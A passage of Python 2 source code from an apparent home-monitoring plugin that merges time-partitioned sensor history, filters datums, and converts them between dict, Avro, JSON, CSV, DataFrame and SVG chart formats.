datums_df["data_df"]], ignore_index=True)
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] merged buffer partition [{}]".format(self.name, bin_timestamp_partition))
datums_buffer.clear()
if len(datums_history) > 0 and bin_timestamp_partition_max is not None:
bin_timestamp_partition_lower = bin_timestamp_partition_max - \
(self.config["history_partitions"] - 1) * self.config["history_partition_seconds"]
for bin_timestamp_partition_del in datums_history.keys():
if bin_timestamp_partition_del < bin_timestamp_partition_lower:
del datums_history[bin_timestamp_partition_del]
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] purged expired partition [{}]".format(self.name,
bin_timestamp_partition_del))
while len(datums_history) > self.config["history_partitions"] or \
sum(len(datums_df_cached["data_df"].index) for datums_df_cached in datums_history.itervalues()) > \
self.config["history_ticks"]:
bin_timestamp_partition_del = min(datums_history.keys())
del datums_history[bin_timestamp_partition_del]
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] purged upperbounded partition [{}]".format(self.name,
bin_timestamp_partition_del))
log_timer.log("Plugin", "timer", lambda: "[{}] partitions [{}]".format(self.name, len(datums_history)),
context=self.datum_merge_buffer_history)
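# Assemble the history partitions selected by the datum filter (either the newest
# "partitions" count or a "start"/"finish" time range) into a single DataFrame, then apply
# the filter and optional resampling before returning it as a one-element datum list.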
def datum_merge_history(self, datums_history, datum_filter):
log_timer = anode.Log(logging.DEBUG).start()
datums = []
if "history_ticks" in self.config and self.config["history_ticks"] > 0 and \
"history_partitions" in self.config and self.config["history_partitions"] > 0 and \
"history_partition_seconds" in self.config and self.config["history_partition_seconds"] > 0:
datums_partitions = []
if "partitions" in datum_filter:
datum_filter_partitions = 0 if not min(datum_filter["partitions"]).isdigit() else int(min(datum_filter["partitions"]))
if datum_filter_partitions > 0 and len(datums_history) > 0:
for datums_partition in sorted(datums_history.iterkeys())[(
(len(datums_history) - datum_filter_partitions) if len(datums_history) > datum_filter_partitions else 0):]:
datums_partitions.append(datums_history[datums_partition]["data_df"])
else:
datums_partition_lower = DATUM_TIMESTAMP_MIN if "start" not in datum_filter else \
(self.get_time_period(int(min(datum_filter["start"])), self.config["history_partition_seconds"]))
datums_partition_upper = DATUM_TIMESTAMP_MAX if "finish" not in datum_filter else \
(self.get_time_period(int(max(datum_filter["finish"])), self.config["history_partition_seconds"]))
for datums_partition in sorted(datums_history.keys()):
if datums_partition_upper >= datums_partition >= datums_partition_lower:
datums_partitions.append(datums_history[datums_partition]["data_df"])
if len(datums_partitions) > 0:
datums_partition_metadata = datums_history.itervalues().next().copy()
if len(datums_partitions) == 1:
datums_partition_metadata["data_df"] = datums_partitions[0].copy(deep=False)
else:
datums_partition_metadata["data_df"] = pandas.concat(datums_partitions, ignore_index=True)
datums_partition_metadata["data_df"] = Plugin.datums_df_resample(
Plugin.datums_df_filter(Plugin.datums_df_reindex(datums_partition_metadata["data_df"]), datum_filter), datum_filter)
datums.append(datums_partition_metadata)
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.datum_merge_history)
return datums
@staticmethod
def datum_encode(datum_dict):
datum_dict_encoded = datum_dict.copy()
for field in ("data_source", "data_metric", "data_temporal", "data_type", "data_unit", "bin_unit"):
datum_dict_encoded[field] = Plugin.datum_field_encode(datum_dict_encoded[field])
return datum_dict_encoded
@staticmethod
def datum_decode(datum_dict):
datum_dict_decoded = datum_dict.copy()
for field in ("data_source", "data_metric", "data_temporal", "data_type", "data_unit", "bin_unit"):
datum_dict_decoded[field] = Plugin.datum_field_decode(datum_dict_decoded[field])
return datum_dict_decoded
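# Build a flat identifier from a "domain__group__name" metric for use in MQTT topics.
# For a hypothetical metric "energy__consumption__shed-power" this yields
# "anode__shed-power__energy__consumption__shed" when "Shed" is listed in DATUM_LOCATIONS,
# falling back to DATUM_LOCATION_DEFAULT for the location segment otherwise.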
@staticmethod
def datum_encode_id(datum_dict):
datum_metric_tokens = datum_dict["data_metric"].split("__")
datum_name = datum_metric_tokens[2] if len(datum_metric_tokens) > 1 else datum_dict["data_metric"]
datum_domain = datum_metric_tokens[0] if len(datum_metric_tokens) > 1 else ""
datum_group = datum_metric_tokens[1] if len(datum_metric_tokens) > 1 else ""
datum_location = datum_metric_tokens[2].split("-")[0].title() if len(datum_metric_tokens) > 1 else ""
datum_location = (datum_location if datum_location in DATUM_LOCATIONS else DATUM_LOCATION_DEFAULT).lower()
return "__".join([
"anode",
datum_name,
datum_domain,
datum_group,
datum_location
])
@staticmethod
def datum_encode_guid(datum_dict):
return "_".join([
datum_dict["data_metric"],
datum_dict["data_type"],
datum_dict["data_unit"],
datum_dict["bin_unit"],
str(datum_dict["bin_width"])])
@staticmethod
def datum_decode_label(datum_dict_decoded):
datum_name = datum_dict_decoded["data_metric"].split(".")[2]
datum_domain = datum_dict_decoded["data_metric"].split(".")[0]
return (" ".join([
datum_name,
datum_domain
])).replace("-", " ").title()
@staticmethod
def datum_tostring(datum_dict):
datum_dict = Plugin.datum_decode(datum_dict)
return "{}.{}.{}.{}{}.{}={}{}{}".format(
datum_dict["data_source"], datum_dict["data_metric"], datum_dict["data_type"], datum_dict["bin_width"],
datum_dict["bin_timestamp"], datum_dict["bin_unit"], int(datum_dict["data_value"]) / Decimal(datum_dict["data_scale"]),
datum_dict["data_unit"], datum_dict["data_string"] if datum_dict["data_string"] is not None else ""
)
def datum_get(self, datum_scope, data_metric, data_type, data_unit, bin_width, bin_unit, data_derived_period=None,
data_derived_unit="day"):
if data_metric in self.datums and data_type in self.datums[data_metric] and data_unit in self.datums[data_metric][data_type] and \
(str(bin_width) + bin_unit) in self.datums[data_metric][data_type][data_unit] and \
datum_scope in self.datums[data_metric][data_type][data_unit][str(bin_width) + bin_unit]:
datum_dict = self.datums[data_metric][data_type][data_unit][str(bin_width) + bin_unit][datum_scope]
return datum_dict if (data_derived_period is None or datum_dict["bin_timestamp"] ==
self.get_time_period(self.get_time(), Plugin.get_seconds(data_derived_period,
data_derived_unit))) else None
return None
def datums_filter_get(self, datums_filtered, datum_filter):
log_timer = anode.Log(logging.DEBUG).start()
for datum_metric in self.datums:
if Plugin.is_filtered(datum_filter, "metrics", datum_metric):
for datum_type in self.datums[datum_metric]:
if Plugin.is_filtered(datum_filter, "types", datum_type):
for datum_unit in self.datums[datum_metric][datum_type]:
if Plugin.is_filtered(datum_filter, "units", datum_unit, exact_match=True):
for datum_bin in self.datums[datum_metric][datum_type][datum_unit]:
if Plugin.is_filtered(datum_filter, "bins", datum_bin):
datum_scopes = [DATUM_QUEUE_LAST] if "scope" not in datum_filter else datum_filter["scope"]
for datum_scope in datum_scopes:
if datum_scope in self.datums[datum_metric][datum_type][datum_unit][datum_bin]:
datums = []
if datum_scope == DATUM_QUEUE_LAST:
datums_format = "dict"
datums = [self.datums[datum_metric][datum_type][datum_unit][datum_bin][datum_scope]]
elif datum_scope == DATUM_QUEUE_HISTORY:
self.datum_merge_buffer_history(
self.datums[datum_metric][datum_type][datum_unit][datum_bin]
[DATUM_QUEUE_BUFFER],
self.datums[datum_metric][datum_type][datum_unit][datum_bin]
[DATUM_QUEUE_HISTORY])
datums_format = "df"
datums = self.datum_merge_history(
self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_HISTORY],
datum_filter)
elif datum_scope == DATUM_QUEUE_PUBLISH:
datums_format = "avro"
datums = self.datums[datum_metric][datum_type][datum_unit][datum_bin][datum_scope]
if datums_format not in datums_filtered:
datums_filtered[datums_format] = []
datums_filtered[datums_format].extend(datums)
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.datums_filter_get)
return datums_filtered
@staticmethod
def datums_filter(datums_filtered, datum_filter, datums):
log_timer = anode.Log(logging.DEBUG).start()
for datum in Plugin.datum_to_format(datums, "dict")["dict"]:
if Plugin.is_filtered(datum_filter, "metrics", datum["data_metric"]):
if Plugin.is_filtered(datum_filter, "types", datum["data_type"]):
if Plugin.is_filtered(datum_filter, "units", datum["data_unit"], exact_match=True):
if Plugin.is_filtered(datum_filter, "bins", str(datum["bin_width"]) + datum["bin_unit"]):
if "dict" not in datums_filtered:
datums_filtered["dict"] = []
datums_filtered["dict"].append(datum)
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_filter)
return datums_filtered
@staticmethod
def is_filtered(datum_filter, datum_filter_field, datum_field, exact_match=False):
if datum_filter_field not in datum_filter:
return True
for datum_filter_field_value in datum_filter[datum_filter_field]:
datum_filter_field_value = Plugin.datum_field_encode(datum_filter_field_value)
if exact_match and datum_field == datum_filter_field_value or not exact_match and \
datum_field.find(datum_filter_field_value) != -1:
return True
return False
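# Sort datums for presentation: primarily by data unit (using a fixed preference order,
# unknown units last), then by metric name, by data type (point, mean, integral, low, high)
# and finally by bin unit (second through year) and bin width.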
@staticmethod
def datums_sort(datums):
return sorted(datums, key=lambda datum: (
"aaaaa" if datum["data_unit"] == "_P24" else
"bbbbb" if datum["data_unit"] == "W" else
"ccccc" if datum["data_unit"] == "Wh" else
"ddddd" if datum["data_unit"] == "ms" else
"eeeee" if datum["data_unit"] == "MB_P2Fs" else
"eeeee" if datum["data_unit"] == "KB_P2Fs" else
"fffff" if datum["data_unit"] == "_P25" else
"zzzzz" + datum["data_unit"],
datum["data_metric"],
"aaaaa" if datum["data_type"] == "point" else
"bbbbb" if datum["data_type"] == "mean" else
"ccccc" if datum["data_type"] == "integral" else
"ddddd" if datum["data_type"] == "low" else
"eeeee" if datum["data_type"] == "high" else
datum["data_type"],
"aaaaa" if datum["bin_unit"] == "second" else
"bbbbb" if datum["bin_unit"] == "minute" else
"ccccc" if datum["bin_unit"] == "hour" else
"ddddd" if datum["bin_unit"] == "day_Dtime" else
"eeeee" if datum["bin_unit"] == "night_Dtime" else
"fffff" if datum["bin_unit"] == "day" else
"ggggg" if datum["bin_unit"] == "month" else
"hhhhh" if datum["bin_unit"] == "year" else
"iiiii",
datum["bin_width"]))
@staticmethod
def datum_dict_to_avro(datum_dict):
avro_writer = io.BytesIO()
avro.io.DatumWriter(DATUM_SCHEMA_AVRO).write(datum_dict, avro.io.BinaryEncoder(avro_writer))
return [avro_writer.getvalue()]
@staticmethod
def datum_dict_to_json(datum_dict):
datum_dict = Plugin.datum_decode(datum_dict)
return [json.dumps(datum_dict, separators=(',', ':'))]
@staticmethod
def datum_dict_to_csv(datum_dict):
datum_dict = datum_dict.copy()
if datum_dict["data_unit"] not in DATUM_SCHEMA_TO_ASCII:
DATUM_SCHEMA_TO_ASCII[datum_dict["data_unit"]] = urllib.quote_plus(datum_dict["data_unit"])
datum_dict["data_unit"] = DATUM_SCHEMA_TO_ASCII[datum_dict["data_unit"]]
if datum_dict["bin_unit"] not in DATUM_SCHEMA_TO_ASCII:
DATUM_SCHEMA_TO_ASCII[datum_dict["bin_unit"]] = urllib.quote_plus(datum_dict["bin_unit"])
datum_dict["bin_unit"] = DATUM_SCHEMA_TO_ASCII[datum_dict["bin_unit"]]
return [','.join(str(datum_dict[datum_field]) for datum_field in DATUM_SCHEMA_MODEL.iterkeys())]
@staticmethod
def datum_dict_to_df(datum_dict):
return Plugin.datums_dict_to_df([datum_dict])
@staticmethod
def datum_df_to_dict(datum_df):
datums_dict_df = Plugin.datums_df_unindex(datum_df["data_df"].copy(deep=False))
datums_dict = datums_dict_df.to_dict(orient="records")
for datum_dict in datums_dict:
datum_dict["data_value"] = numpy.asscalar(datum_dict["data_value"])
datum_dict["bin_timestamp"] = numpy.asscalar(datum_dict["bin_timestamp"])
datum_dict["data_timestamp"] = numpy.asscalar(datum_dict["data_timestamp"])
datum_dict.update(datum_df)
del datum_dict["data_df"]
return datums_dict
@staticmethod
def datum_avro_to_dict(datum_avro):
return [{datum_key.encode("utf-8"): (datum_value.encode("utf-8") if isinstance(datum_value, unicode) else datum_value)
for datum_key, datum_value in
avro.io.DatumReader(DATUM_SCHEMA_AVRO).read(avro.io.BinaryDecoder(io.BytesIO(datum_avro))).items()}]
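# Convert a map of datum lists keyed by their current format ("dict", "df", "avro", ...)
# into a single target format. Dict datums are sorted first; formats without a direct
# conversion (e.g. avro) are first converted to dict and the function recurses. Work is
# batched, with optional sleeps between batches when running off the main thread.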
# noinspection PyUnusedLocal
@staticmethod
def datum_to_format(datums, datum_format, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
count = 0
count_sum = sum(len(datums_values) for datums_values in datums.values())
if "dict" in datums and len(datums["dict"]) > 0:
datums["dict"] = Plugin.datums_sort(datums["dict"])
log_timer.log("Plugin", "timer",
lambda: "[*] count and sort for [{}] dict datums".format(len(datums["dict"])) if "dict" in datums else 0,
context=Plugin.datum_to_format, off_thread=off_thread)
log_timer = anode.Log(logging.DEBUG).start()
datums_formatted = {datum_format: []}
datum_to_format_iterate = False
for datums_format, datums_value in datums.iteritems():
datums_format_function = None
if datums_format == "dict":
if datum_format == "avro":
datums_format_function = Plugin.datum_dict_to_avro
elif datum_format == "json":
datums_format_function = Plugin.datum_dict_to_json
elif datum_format == "csv":
datums_format_function = Plugin.datum_dict_to_csv
elif datum_format == "df":
datums_format_function = Plugin.datum_dict_to_df
elif datum_format != "dict":
raise ValueError("Unknown datum format conversion [{}] to [{}]".format(datums_format, datum_format))
elif datums_format == "df" and datum_format == "dict":
datums_format_function = Plugin.datum_df_to_dict
elif datums_format != datum_format:
datum_to_format_iterate = datum_format != "dict"
if datums_format == "avro":
datums_format_function = Plugin.datum_avro_to_dict
else:
raise ValueError("Unknown datum format conversion [{}] to [{}]".format(datums_format, datum_format))
if ("dict" if datum_to_format_iterate else datum_format) not in datums_formatted:
datums_formatted["dict" if datum_to_format_iterate else datum_format] = []
if datums_format_function is None:
datums_formatted["dict" if datum_to_format_iterate else datum_format].extend(datums_value)
count += len(datums_value)
else:
for datum in datums_value:
datums_formatted["dict" if datum_to_format_iterate else datum_format].extend(datums_format_function(datum))
count += 1
if count % SERIALISATION_BATCH == 0 or count == count_sum:
if off_thread and count < count_sum:
log_timer.pause()
time.sleep(SERIALISATION_BATCH_SLEEP)
log_timer.start()
log_timer.log("Plugin", "timer", lambda: "[*] {} to {} for [{}] datums".format(",".join(datums.keys()), datum_format, count),
context=Plugin.datum_to_format, off_thread=off_thread)
return datums_formatted if not datum_to_format_iterate else Plugin.datum_to_format(datums_formatted, datum_format, off_thread)
# noinspection PyArgumentList
@staticmethod
def datums_csv_to_dict(datums_csv):
datums_dict = {"dict": []}
for datum_dict in datums_csv:
datum_dict["data_value"] = long(datum_dict["data_value"])
datum_dict["data_unit"] = HTMLParser.HTMLParser().unescape(datum_dict["data_unit"])
if datum_dict["data_unit"] not in DATUM_SCHEMA_FROM_ASCII:
DATUM_SCHEMA_FROM_ASCII[datum_dict["data_unit"]] = \
urllib.unquote_plus(datum_dict["data_unit"].encode("utf-8")).decode("utf-8")
datum_dict["data_scale"] = float(datum_dict["data_scale"])
datum_dict["data_timestamp"] = long(datum_dict["data_timestamp"])
datum_dict["bin_timestamp"] = long(datum_dict["bin_timestamp"])
datum_dict["bin_width"] = int(datum_dict["bin_width"])
if datum_dict["bin_unit"] not in DATUM_SCHEMA_FROM_ASCII:
DATUM_SCHEMA_FROM_ASCII[datum_dict["bin_unit"]] = \
urllib.unquote_plus(datum_dict["bin_unit"].encode("utf-8")).decode("utf-8")
datums_dict["dict"].append(datum_dict)
return datums_dict
@staticmethod
def datums_dict_to_json(datums_dict, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
count = 0
datums_json_fragments = []
for datum_dict in datums_dict:
datums_json_fragments.append(Plugin.datum_dict_to_json(datum_dict)[0])
count += 1
if count % SERIALISATION_BATCH == 0 or count == len(datums_dict):
datums_json_fragments = [",".join(datums_json_fragments)]
if off_thread and count < len(datums_dict):
log_timer.pause()
time.sleep(SERIALISATION_BATCH_SLEEP)
log_timer.start()
datums_json = "".join(["[", "" if len(datums_json_fragments) == 0 else datums_json_fragments[0], "]"])
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_dict_to_json, off_thread=off_thread)
return datums_json
@staticmethod
def datums_dict_to_df(datums_dict, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
datums_df = []
datums_data = {}
datums_metadata = {}
for datum_dict in datums_dict:
datum_id = "_".join([datum_dict["data_metric"], datum_dict["data_type"], str(datum_dict["bin_width"]) + datum_dict["bin_unit"]])
if datum_id not in datums_metadata:
datum_metadata = datum_dict.copy()
del datum_metadata["bin_timestamp"]
del datum_metadata["data_timestamp"]
del datum_metadata["data_value"]
datums_metadata[datum_id] = datum_metadata
datums_data[datum_id] = []
datums_data[datum_id].append({"bin_timestamp": datum_dict["bin_timestamp"], "data_timestamp": datum_dict["data_timestamp"],
"data_value": datum_dict["data_value"]})
for datum_id, datum_metadata in datums_metadata.iteritems():
datum_metadata["data_df"] = pandas.DataFrame(datums_data[datum_id])
datums_df.append(datum_metadata)
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_dict_to_df, off_thread=off_thread)
return datums_df
@staticmethod
def datums_df_to_csv(datums_df, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
datums_csv = datums_df.to_csv(index=False)
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_df_to_csv, off_thread=off_thread)
return datums_csv
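# Render a time-indexed DataFrame as an SVG line chart: dark background, one line per
# column, x-axis tick locators chosen from the covered time range (seconds up to multiple
# days), a right-hand y-axis and an optional title taken from the DataFrame's "title"
# attribute; returns SVG_EMPTY when there is nothing to plot.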
@staticmethod
def datums_df_to_svg(datums_df, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
datums_plot_font_size = 14
datums_plot_alpha = 0.7
datums_plot_colour = "white"
datums_plot_colour_foreground = "0.5"
datums_plot_colour_background = "black"
datums_plot_colour_lines = \
["yellow", "lime", "red", "orange", "dodgerblue", "coral", "magenta", "aliceblue", "cyan", "darkgreen", "maroon"]
datums_plot_title = datums_df.title if hasattr(datums_df, "title") else None
datums_plot_buffer = StringIO()
datums_df = Plugin.datums_df_reindex(datums_df)
datums_points = len(datums_df.index)
datums_axes_x_range = ((datums_df.index[-1] - datums_df.index[0]).total_seconds()) if datums_points > 0 else 0
if datums_points == 0 or datums_axes_x_range == 0:
return SVG_EMPTY
datums_figure = Figure()
datums_axes = datums_figure.add_subplot(111)
datums_axes.set_prop_cycle(cycler("color", datums_plot_colour_lines))
for column in datums_df:
datums_axes.plot(datums_df.index, datums_df[column])
datums_axes.margins(0, 0, tight=True)
datums_axes.minorticks_off()
if datums_axes_x_range <= (10 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.SecondLocator(interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M:%S"))
elif datums_axes_x_range <= (60 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.SecondLocator(bysecond=[0, 10, 20, 30, 40, 50], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M:%S"))
if datums_axes_x_range <= (60 * 2 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.MinuteLocator(interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
if datums_axes_x_range <= (60 * 10 + 2):
datums_axes.xaxis.set_major_locator(
matplotlib.dates.MinuteLocator(byminute=[0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.MinuteLocator(byminute=[0, 10, 20, 30, 40, 50], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 4 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.MinuteLocator(byminute=[0, 30], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 8 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.HourLocator(interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 16 + 2):
datums_axes.xaxis.set_major_locator(
matplotlib.dates.HourLocator(byhour=[0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 24 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.HourLocator(byhour=[0, 4, 8, 12, 16, 20], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 24 * 3 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.HourLocator(byhour=[0, 8, 16], interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%H:%M"))
elif datums_axes_x_range <= (60 * 60 * 24 * 14 + 2):
datums_axes.xaxis.set_major_locator(matplotlib.dates.DayLocator(interval=1))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%a"))
else:
datums_axes.xaxis.set_major_locator(matplotlib.dates.DayLocator(interval=3))
datums_axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter("%a"))
datums_axes.xaxis.label.set_visible(False)
datums_axes.xaxis.label.set_color(datums_plot_colour)
datums_axes.tick_params(axis="x", colors=datums_plot_colour)
datums_axes.yaxis.tick_right()
datums_axes.yaxis.label.set_color(datums_plot_colour)
datums_axes.yaxis.grid(b=True, which="major", color=datums_plot_colour_foreground, linestyle='--')
datums_axes.tick_params(axis="y", colors=datums_plot_colour)
datums_axes.spines["bottom"].set_color(datums_plot_colour)
datums_axes.spines["top"].set_color(datums_plot_colour)
datums_axes.spines["left"].set_color(datums_plot_colour)
datums_axes.spines["right"].set_color(datums_plot_colour)
datums_axes.patch.set_facecolor(datums_plot_colour_background)
if datums_plot_title is not None and (len(max(datums_df.columns.values, key=len)) + len(datums_plot_title)) > 40:
datums_plot_legend = datums_axes.legend(loc="lower left", ncol=1)
else:
datums_plot_legend = datums_axes.legend(loc="upper left", ncol=1)
if datums_plot_legend is not None:
for datums_plot_legend_text in datums_plot_legend.get_texts():
datums_plot_legend_text.set_fontsize(datums_plot_font_size)
datums_plot_legend_text.set_color(datums_plot_colour)
datums_plot_legend.get_frame().set_alpha(datums_plot_alpha)
datums_plot_legend.get_frame().set_edgecolor(datums_plot_colour_foreground)
datums_plot_legend.get_frame().set_facecolor(datums_plot_colour_background)
datums_figure.subplots_adjust(left=0, right=0.9, top=0.9725, bottom=0.08)
datums_canvas = FigureCanvas(datums_figure)
datums_canvas.draw()
if datums_plot_title is not None:
datums_axes.text(0.98, 0.975, datums_plot_title, horizontalalignment="right", verticalalignment="top",
transform=datums_axes.transAxes, color=datums_plot_colour, fontsize=datums_plot_font_size,
bbox=dict(facecolor=datums_plot_colour_background, edgecolor=datums_plot_colour_background,
alpha=datums_plot_alpha, boxstyle="round,pad=0.2"))
datums_axes_x_labels = [tick.get_text() for tick in datums_axes.get_xticklabels()]
if len(datums_axes_x_labels) > 1:
datums_axes_x_labels[0] = u""
datums_axes.set_xticklabels(datums_axes_x_labels)
datums_axes.set_ylim([datums_axes.get_ylim()[0] * 0.9, datums_axes.get_ylim()[1] * 1.15])
datums_figure.set_size_inches(6, 3.35)
datums_canvas.print_figure(datums_plot_buffer, facecolor=datums_plot_colour_background, format="svg")
datums_figure.clf()
plot.close()
del datums_canvas
del datums_figure
del datums_df
datums_plot_buffer.seek(0)
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_df_to_svg, off_thread=off_thread)
return datums_plot_buffer.buf
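# Merge a list of per-metric datum dictionaries (each carrying a "data_df" DataFrame) into
# wide result DataFrames: group by an encoded column name (metric, type, bin, unit, scale,
# temporal, source, anode id), concatenate each group, scale raw values by "data_scale",
# outer-join the groups on bin_timestamp, then resample/fill and optionally pretty-print
# according to datum_options.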
@staticmethod
def datums_df_to_df(datums_df, datum_options=None, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
datums_df_df = []
if len(datums_df) > 0:
log_timer_input = anode.Log(logging.DEBUG).start()
datums_df_groups = {}
for datums_df_dict in datums_df:
datums_df_dict_decoded = Plugin.datum_decode(datums_df_dict)
if datums_df_dict_decoded["data_unit"] not in DATUM_SCHEMA_TO_ASCII:
DATUM_SCHEMA_TO_ASCII[datums_df_dict_decoded["data_unit"]] = urllib.quote_plus(datums_df_dict_decoded["data_unit"])
if datums_df_dict_decoded["bin_unit"] not in DATUM_SCHEMA_TO_ASCII:
DATUM_SCHEMA_TO_ASCII[datums_df_dict_decoded["bin_unit"]] = urllib.quote_plus(datums_df_dict_decoded["bin_unit"])
datum_name = "&".join(
["metrics=" + datums_df_dict_decoded["data_metric"],
"types=" + datums_df_dict_decoded["data_type"],
"bins=" + str(datums_df_dict_decoded["bin_width"]) + DATUM_SCHEMA_TO_ASCII[datums_df_dict_decoded["bin_unit"]],
"unit=" + DATUM_SCHEMA_TO_ASCII[datums_df_dict_decoded["data_unit"]],
"scale=" + str(datums_df_dict_decoded["data_scale"]),
"temporal=" + datums_df_dict_decoded["data_temporal"],
"source=" + datums_df_dict_decoded["data_source"],
"anode_id=" + ID_BASE64
]
).decode("utf-8")
if datum_name not in datums_df_groups:
datums_df_groups[datum_name] = datums_df_dict.copy()
datums_df_groups[datum_name]["data_df"] = [datums_df_dict["data_df"]]
else:
datums_df_groups[datum_name]["data_df"].append(datums_df_dict["data_df"])
log_timer_input.log("Plugin", "timer", lambda: "[*] input [{}] dataframes and [{}] datums".format(
len(datums_df),
sum(len(datums_df_value["data_df"].index) for datums_df_value in datums_df)), context=Plugin.datums_df_to_df,
off_thread=off_thread)
log_timer_intermediate = anode.Log(logging.DEBUG).start()
datums_df_groups_concat = {}
datums_df_groups_concat_data = []
for datum_name, datums_df_dict in datums_df_groups.iteritems():
datums_df_dict_df = pandas.concat(datums_df_dict["data_df"])
datums_df_dict_df = Plugin.datums_df_reindex(datums_df_dict_df)
datums_df_dict_df["data_value"] = (datums_df_dict_df["data_value"] / datums_df_dict["data_scale"]).astype(
numpy.dtype(decimal.Decimal))
datums_df_dict_df.rename(
columns={"data_timestamp": "data_timestamp@" + datum_name, "data_value": "data_value_scaled@" + datum_name},
inplace=True)
datums_df_groups_concat_data.append("data_value_scaled@" + datum_name)
datums_df_groups_concat[datum_name] = datums_df_dict_df
datum_df = pandas.concat(datums_df_groups_concat.values(), axis=1, join="outer")
log_timer_intermediate.log("Plugin", "timer", lambda: "[*] intermediate [{}] dataframes and [{}] datums".format(
len(datums_df_groups_concat),
sum(len(datums_df_groups_concat_df.index) for datums_df_groups_concat_df in datums_df_groups_concat.values())),
context=Plugin.datums_df_to_df, off_thread=off_thread)
log_timer_output = anode.Log(logging.DEBUG).start()
datum_df = Plugin.datums_df_unindex(
Plugin.datums_df_fill(
Plugin.datums_df_resample(datum_df, datum_options), datums_df_groups_concat_data, datum_options))
if "print" in datum_options and datum_options["print"][0] == "pretty":
datum_df = Plugin.datums_df_metadata_pretty(Plugin.datums_df_data_pretty(datum_df))
datums_df_df.append(datum_df)
log_timer_output.log("Plugin", "timer", lambda: "[*] output [{}] dataframes and [{}] datums".format(
len(datums_df_df),
sum(response_df[response_df_column].count() for response_df in datums_df_df for response_df_column in response_df if
response_df_column.startswith("data_value"))),
context=Plugin.datums_df_to_df, off_thread=off_thread)
log_timer.log("Plugin", "timer", lambda: "[*]", context=Plugin.datums_df_to_df, off_thread=off_thread)
return datums_df_df
@staticmethod
def datums_to_format(datums, datum_format, datum_options, off_thread=False):
log_timer = anode.Log(logging.DEBUG).start()
datums_count = 0
for datums_format, datums_value in datums.iteritems():
if datums_format == "df":
datums_count += sum(len(datums_value_df["data_df"].index) for datums_value_df in datums_value)
else:
datums_count += len(datums_value)
if datum_format == "json" or datum_format == "dict":
datums_formatted = Plugin.datum_to_format(datums, "dict", off_thread)["dict"]
if datum_format == "json":
datums_formatted = Plugin.datums_dict_to_json(datums_formatted, off_thread)
elif datum_format == "csv" or datum_format == "svg" or datum_format == "df":
datums_formatted = Plugin.datums_df_to_df(Plugin.datum_to_format(datums, "df", off_thread)["df"], datum_options,
off_thread=off_thread)
if datum_format == "csv":
datums_formatted = Plugin.datums_df_to_csv(datums_formatted[0], off_thread) if len(datums_formatted) > 0 else ""
elif datum_format == "svg":
datums_formatted = Plugin.datums_df_to_svg(datums_formatted[0], off_thread) if len(datums_formatted) > 0 else SVG_EMPTY
else:
raise ValueError("Unknown datum format [{}]".format(datum_format))
log_timer.log("Plugin", "timer", lambda: "[*] {} to {} for [{}] datums".format(",".join(datums.keys()), datum_format, datums_count),
context=Plugin.datums_to_format, off_thread=off_thread)
return datums_formatted
@staticmethod
def datums_df_title(datum_df, datum_df_title=None):
if datum_df_title is not None:
datum_df.title = datum_df_title
return datum_df_title if datum_df_title is not None else (datum_df.title if hasattr(datum_df, "title") else None)
@staticmethod
def datums_df_reindex(datum_df):
datum_df_title = Plugin.datums_df_title(datum_df)
if "Time" in datum_df:
datum_df["bin_timestamp"] = pandas.to_datetime(datum_df["Time"])
datum_df["bin_timestamp"] = (datum_df['bin_timestamp'] - datetime.datetime(1970, 1, 1)).dt.total_seconds()
del datum_df["Time"]
if "bin_timestamp" in datum_df:
datum_df = datum_df[~datum_df["bin_timestamp"].duplicated(keep="first")]
datum_df.set_index("bin_timestamp", inplace=True)
datum_df.index = pandas.to_datetime(datum_df.index, unit="s")
Plugin.datums_df_title(datum_df, datum_df_title)
return datum_df
@staticmethod
def datums_df_unindex(datum_df):
